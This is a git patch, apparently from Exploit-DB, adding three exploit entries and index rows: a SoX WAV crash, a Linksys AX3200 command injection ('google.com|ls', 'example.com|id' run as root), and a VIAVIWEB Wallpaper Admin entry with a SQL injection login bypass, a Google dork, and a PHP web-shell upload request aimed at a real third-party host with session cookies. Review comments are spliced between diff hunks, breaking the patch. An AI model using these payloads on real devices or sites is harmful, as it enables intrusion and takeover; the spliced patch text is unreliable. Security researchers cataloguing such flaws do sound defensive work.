From 6206f4f20893f64c4556027331dc7ccf18d96c4f Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Thu, 23 Mar 2023 00:16:30 +0000
Subject: [PATCH] DB: 2023-03-23

4 changes to exploits/shellcodes/ghdb

SoX 14.4.2 - Denial Of Service
Linksys AX3200 V1.1.00 - Command Injection
VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
---
 exploits/hardware/dos/51034.txt | 77 +++++++++++++++++++++++++++++
 exploits/hardware/webapps/51035.txt | 16 ++++++
 exploits/php/webapps/51033.txt | 69 ++++++++++++++++++++++++++
 files_exploits.csv | 3 ++
 4 files changed, 165 insertions(+)
 create mode 100644 exploits/hardware/dos/51034.txt
 create mode 100644 exploits/hardware/webapps/51035.txt
 create mode 100644 exploits/php/webapps/51033.txt

diff --git a/exploits/hardware/dos/51034.txt b/exploits/hardware/dos/51034.txt
new file mode 100644
index 000000000..3f19c8149
--- /dev/null
+++ b/exploits/hardware/dos/51034.txt
@@ -0,0 +1,77 @@
+# Exploit Title: SoX 14.4.2 - Denial Of Service
+# Exploit Author: LiquidWorm
+
+
+Vendor: Chris Bagwell
+Product web page: http://sox.sourceforge.net
+ https://en.wikipedia.org/wiki/SoX
+Affected version: <=14.4.2
+
+Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
+tools: it can convert sound files between many different file formats and
+audio devices, and can apply many sound effects and transformations, as well
+as doing basic analysis and providing input to more capable analysis and
+plotting tools.
+
+Desc: SoX suffers from a division by zero attack when handling WAV files,
+resulting in denial of service vulnerability and possibly loss of data.
+
+Tested on: Ubuntu 18.04.6 LTS
+ Microsoft Windows 10 Home
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2022-5712
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
+
+CWE ID: 369
+CWE URL: https://cwe.mitre.org/data/definitions/369.html
+
+
+05.09.2022
+
+--
+
+
+PoC:
+
+https://zeroscience.mk/codes/sox_div0.wav.zip
+
+---
+
+$ ./sox div0.wav test.wav reverse
+Floating point exception (core dumped)
+...
+Program received signal SIGFPE, Arithmetic exception.
+0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
+(gdb) bt
+#0 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
+#1 0x000055555558dcc2 in open_read (path=, buffer=, buffer_size=, signal=0x5555559a5140, encoding=, filetype=0x555555777621 "wav")
+ at formats.c:545
+#2 0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945
+...
+Program received signal SIGFPE, Arithmetic exception.
+0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+1457 blocksWritten = MS_UNSPEC/wBlockAlign;
+(gdb) bt
+#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+#1 startwrite (ft=0x5555559a6a90) at wav.c:1252
+#2 0x0000555555591669 in open_write (path=, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0,
+ signal=, encoding=, filetype=, oob=, overwrite_permitted=) at formats.c:912
+#3 0x0000555555593913 in sox_open_write (path=, signal=, encoding=, filetype=, oob=, overwrite_permitted=)
+ at formats.c:948
+#4 0x000055555556b620 in open_output_file () at sox.c:1557
+#5 process () at sox.c:1754
+#6 main (argc=, argv=) at sox.c:3008
+(gdb) bt full
+#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+ wFormatTag = 1
+ dwAvgBytesPerSec = 0
+ dwFactSize = 4
+ bytespersample =
+ blocksWritten =
+ dwSamplesWritten = 0
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51035.txt b/exploits/hardware/webapps/51035.txt
new file mode 100644
index 000000000..00c6afd36
--- /dev/null
+++ b/exploits/hardware/webapps/51035.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
+# Date: 2022-09-19
+# Exploit Author: Ahmed Alroky
+# Author: Linksys
+# Version: 1.1.00
+# Authentication Required: YES
+# CVE : CVE-2022-38841
+
+# Tested on: Windows
+
+# Proof Of Concept:
+
+1 - login into AX3200 webui
+2 - go to diagnostics page
+3 - put "google.com|ls" to perform a traceroute
+4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
\ No newline at end of file
diff --git a/exploits/php/webapps/51033.txt b/exploits/php/webapps/51033.txt
new file mode 100644
index 000000000..a2101fc50
--- /dev/null
+++ b/exploits/php/webapps/51033.txt
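Review bot: The backtrace pins the second crash to `1457 blocksWritten = MS_UNSPEC/wBlockAlign;` in wavwritehdr (with an earlier SIGFPE in startread at wav.c:950), but the advisory text only says "division by zero" and never names the field or what a fix looks like. A short root-cause line after the Desc paragraph, such as `Root cause: the divisor at wav.c:1457 (wBlockAlign) is derived from the untrusted input header without a zero check; rejecting a zero block-align in startread likely covers both crashes.`, would make the entry actionable for maintainers and packagers. The `bt full` locals show `dwAvgBytesPerSec = 0`, which is consistent with a zero block-align propagated from the input file, but that should be confirmed against wav.c:950 rather than stated. The bare `05.09.2022` line carries no label and is ambiguous between day-first and month-first; an ISO 8601 date with a label (e.g. `Disclosure date: ...`) would remove the ambiguity.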
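Review bot: The header line `# Author: Linksys` in the Linksys AX3200 entry mislabels the vendor — the exploit author is already given on the line above — so `# Vendor: Linksys` (or the template's `# Vendor Homepage:` field) is what was meant. `# Tested on: Windows` likewise describes the operator's client rather than the affected firmware, which is only implied by `# Version: 1.1.00`. The entry stops at the proof of concept; for the defenders this index serves, a closing `# Mitigation:` line noting that the diagnostics handler should validate the host field as a hostname or IP address and invoke traceroute without a shell, and that the web UI should not run as root, would be more useful than the two example commands. No fixed firmware version is referenced, so readers cannot tell whether an update is available.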
@@ -0,0 +1,69 @@
+# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
+# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
+# Date: [18/09/2022]
+# Exploit Author: [Edd13Mora]
+# Vendor Homepage: [www.viaviweb.com]
+# Version: [N/A]
+# Tested on: [Windows 11 - Kali Linux]
+
+------------------
+SQLI on the Login page
+------------------
+payload --> admin' or 1=1-- -
+---
+POC:
+---
+[1] Disable JavaScript on ur browser put the payload and submit
+[2] Reactive JavaScript and resend the request
+---------------------------
+Authenticated SQL Injection:
+---------------------------
+Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
+-----------------------------------------------
+Remote Code Execution (RCE none authenticated):
+-----------------------------------------------
+Poc:
+----
+Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
+--------------------
+Burp Request :
+--------------------
+
+POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
+Host: http://googlezik.freehostia.com
+Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
+Content-Length: 467
+Origin: http://googlezik.freehostia.com
+Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="category_id"
+
+1
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="image[]"; filename="poc.php"
+Content-Type: image/png
+
+
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------33893919268150571572221367848--
+
+
+Uploaded File can be found here :
+--------------------------------
+http://localhost/PAth-Where-Script-Installed/categories/
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c094b8f1d..62f992a32 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
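Review bot: The Burp request in the VIAVIWEB entry targets a concrete third-party host (`Host: http://googlezik.freehostia.com`, repeated in `Origin:` and `Referer:`) and carries a live-looking `Cookie:` header with a PHPSESSID and a GitHub `_octo` value, while every other endpoint in the same file uses the `http://localhost/PAth-Where-Script-Installed/` placeholder; those headers should be rewritten to the placeholder (`Host: localhost`) and the cookie values redacted before publication, and the `Host:` value is in any case not a valid Host header because it includes the scheme. Several template placeholders were left unfilled in the header (`# Date: [18/09/2022]`, `# Version: [N/A]`, `# Tested on: [Windows 11 - Kali Linux]`), the `image[]` part of the multipart body is empty in the committed text and should be marked as redacted if that is intended, and the final triple-backtick line closes a fence that was never opened. On the defensive side the entry names the upload endpoint and the `categories/` directory but not the fix: the handler should validate uploads against an extension allow-list and file content rather than the client-supplied `Content-Type: image/png`, and store them outside the web root under a server-generated name.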
@@ -3165,6 +3165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware,,2005-05-26,2013-05-26,1,,,,,,https://www.securityfocus.com/bid/13782/info
 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,,2018-02-28,2018-04-25,0,,Console,,http://www.exploit-db.com/screenshots/idlt44500/screenshot.png,,https://github.com/ALEXZZZ9/PS4-5.01-WebKit-Exploit-PoC/tree/bf295a89c4f78164275c024710540662e0bce83b
 1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",dos,hardware,,2006-02-05,,1,OSVDB-23055;CVE-2006-0671,,,,,
+51034,exploits/hardware/dos/51034.txt,"SoX 14.4.2 - Denial Of Service",2023-03-22,LiquidWorm,dos,hardware,,2023-03-22,2023-03-22,0,,,,,,
 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000,2019-01-28,2019-01-28,0,CVE-2019-6973,"Denial of Service (DoS)",,,,
 28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",dos,hardware,,2006-07-15,2013-09-17,1,CVE-2006-3787;OSVDB-27337,,,,,https://www.securityfocus.com/bid/18996/info
 40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,dos,hardware,,2016-11-02,2016-11-09,0,,,,,,
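Review bot: The new row files SoX 14.4.2 under platform `hardware` (matching the path `exploits/hardware/dos/51034.txt` created in the first hunk), yet the advisory itself describes a sound-processing tool tested on Ubuntu 18.04.6 and Windows 10, so this looks like a misclassification; `multiple` (or the specific OS) would match how the index categorises other cross-platform software, and the file path would move with it. The codes column is left empty even though the advisory carries `ZSL-2022-5712`; if that column is reserved for CVE/OSVDB identifiers this is fine, otherwise the advisory ID belongs there so the entry can be cross-referenced. `date_published` is set to 2023-03-22 while the advisory is dated 05.09.2022, which is presumably the index's add-date convention but is worth a glance.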
@@ -4431,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,,2014-07-24,2014-07-24,0,OSVDB-109522;OSVDB-109521;OSVDB-109520;OSVDB-109519;OSVDB-109518,,,,,
 40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",webapps,hardware,,2016-11-02,2016-11-02,0,,,,,,https://github.com/XiphosResearch/exploits/tree/master/deathsize
 47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,,2019-11-13,2019-11-13,0,,,,,,
+51035,exploits/hardware/webapps/51035.txt,"Linksys AX3200 V1.1.00 - Command Injection",2023-03-22,"Ahmed Alroky",webapps,hardware,,2023-03-22,2023-03-22,0,CVE-2022-38841,,,,,
 24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware,,2013-02-11,2013-02-11,1,OSVDB-89916;OSVDB-89915;OSVDB-89914;OSVDB-89913;OSVDB-89912;OSVDB-89911;CVE-2013-2678,,,http://www.exploit-db.com/screenshots/idlt24500/screen-shot-2013-02-11-at-110220-am.png,,http://www.s3cur1ty.de/m1adv2013-004
 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,,2021-03-25,2021-03-25,0,CVE-2012-6708,,,,,
 49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,,2020-12-17,2020-12-17,0,,,,,,
@@ -31181,6 +31183,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
+51033,exploits/php/webapps/51033.txt,"VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities",2023-03-22,Edd13Mora,webapps,php,,2023-03-22,2023-03-22,0,,,,,,
 6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,webapps,php,,2008-11-03,,1,OSVDB-54277;CVE-2008-6795,,,,,
 6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,webapps,php,,2008-11-03,2016-12-30,1,OSVDB-54277;CVE-2008-6795,,,,,
 36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49304/info